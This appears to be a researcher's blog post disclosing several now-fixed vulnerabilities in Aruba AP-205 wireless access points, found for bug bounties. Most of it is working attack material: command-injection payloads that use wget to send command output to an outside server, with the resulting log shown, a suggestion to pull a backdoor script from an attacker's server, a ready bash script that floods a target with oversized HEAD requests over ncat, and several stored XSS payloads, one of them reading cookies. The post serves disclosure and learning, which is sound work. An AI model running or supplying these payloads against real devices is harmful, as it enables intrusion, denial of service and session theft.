Aruba Networks AP-205 (Multiple Vulnerabilities)

It’s been a while since I put out a new blog post, so I thought I’d share some insights into some older vulnerabilities I discovered while hacking on Aruba’s AP-205 wifi routers. Aruba was nice enough to ship out 2 FREE AP-205 devices to test and I ended up finding several vulnerabilities which paid out a total of ~$1,500. Not too shabby and I got to keep the routers after which was super cool of them! I’m releasing the technical details here purely for educational use. All of the vulnerabilities noted here have now been fixed. Enjoy! -1N3

Aruba AP-205 Remote Command Injection Vulnerability


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $750.00

Aruba Networks AP-205 wireless routers suffer from remote command injection vulnerability in the WISPr input fields. This can be exploited by an attacker with authenticated access to the AP by crafting special escape character strings followed by standard linux commands. The Operator name, Location name and SSID/Zone fields are all vulnerable as seen by the below output. A permanent web backdoor could also be leveraged with time using the wget -O options to remotely grab a backdoor script from the attackers server and place locally in the web directory. PoC BLIND TIME BASED COMMAND EXECUTION:

wget http://192.168.1.145/test?`sleep 1`
RESULT: 1+ second delay in response time

wget http://192.168.1.145/test?`sleep 5`
RESULT: 5+ second delay in response time

wget http://192.168.1.145/test?`sleep 10`
RESULT: 10+ second delay in response time

REMOTE CONFIRMATION COMMAND EXECUTION:

; wget http://192.168.1.145/?`whoami`?`uname`?`pwd`
RESULT:
==> /var/log/apache2/crowdshield_access.log <==
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin HTTP/1.1" 200 7345 "-" "Wget"
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin, HTTP/1.1" 200 7345 "-" "Wget"
192.168.1.148 - - [12/Aug/2015:19:56:09 -0400] "GET /?root?Linux?/aruba/bin HTTP/1.1" 200 7345 "-" "Wget"

Aruba AP-205 Buffer Overflow Exploit (Memory Dislosure & DoS)


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

The Aruba Networks AP-205 series is prone to a remote buffer overflow vulnerability because it fails to bounds-check user supplied input before copying it into an insufficiently sized memory buffer. Writing outside the bounds of a block of allocated memory results in a memory leak of sensitive details, denial of service and could lead to remote code execution. HTTP Request

HEAD / <INJECT LONG STRING UP TO 80900 BYTES HERE>
Host: instant.arubanetworks.com

Exploit Code PoC

#!/bin/bash
# Aruba Networks AP-205 Buffer Overflow Vulnerability
# Company: Aruba Networks
# Device Model: AP-205
# Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
# Researcher: 1N3 @ https://crowdshield.com
# Date: 8/10/2015
#
# The Aruba Networks AP-205 series is prone to a remote buffer overflow
# vulnerability because it fails to bounds-check user-supplied input
# before copying it into an insufficiently sized memory buffer. Writing
# outside the bounds of a block of allocated memory results in a memory
# leak of sensitive details, denial of service and could lead to remote
# code execution.
#

TARGET="$1"

if [ -z $TARGET ]; then
echo "+ -- --=[Aruba Networks AP-205 Series BoF PoC by 1N3"
echo "+ -- --=[http://crowdshield.com"
echo "+ -- --=[Usage: aruba_ap205_bof_poc "
echo ""
exit
fi

rm -f /tmp/buf
echo "HEAD / " `perl -e 'print "1"x80900'` > /tmp/buf
echo "Host: $TARGET" >> /tmp/buf
echo "" >> /tmp/buf
echo "Sending exploit..."
# cat /tmp/buf #DEBUG ONLY

for a in {1..1000};
do
cat /tmp/buf | ncat --ssl $TARGET 4343;
done

rm -f /tmp/buf

Screenshots
PoC Video

Walled Garden Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Walled Garden feature suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
whitelist & blacklist input form fields Payload
“><iframe onload=alert(document.cookie)>

Captive Portal Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Captive Portal function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
title, welcome text and body text Payload
<iframe onload=prompt(1)> NOTE: This seems to only impact potential wifi guests connecting to the captive portal and may be intended functionality of the device.

DHCP Server Options Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers DHCP Server Options function suffers from a stored DOM XSS vulnerability. Bug URL https://192.168.1.148:4343/#home Affected Parameter
vpn-scope-dhcp-option-valueX Payload
“><iframe onload=alert(document.cookie)></iframe>

SNMP Users Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers SNMP Users function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
snmp-username Payload
<iframe onmouseover=prompt(1)>

Enterprise Domains Stored DOM XSS


Company: Aruba Networks
Device Model: AP-205
Firmware Version: ArubaOS 6.4.2.3-4.1.1.4_49446
Researcher: [email protected]
Bounty: $150.00

Aruba Networks AP-205 wireless routers Enterprise Domains function suffers from a stored DOM XSS vulnerability. Bug URL
https://192.168.1.148:4343/#home Affected Parameter
domain-name input field Payload
<img src=x onmouseover=alert(1)>

Leave a Reply

Your email address will not be published. Required fields are marked *

one × 4 =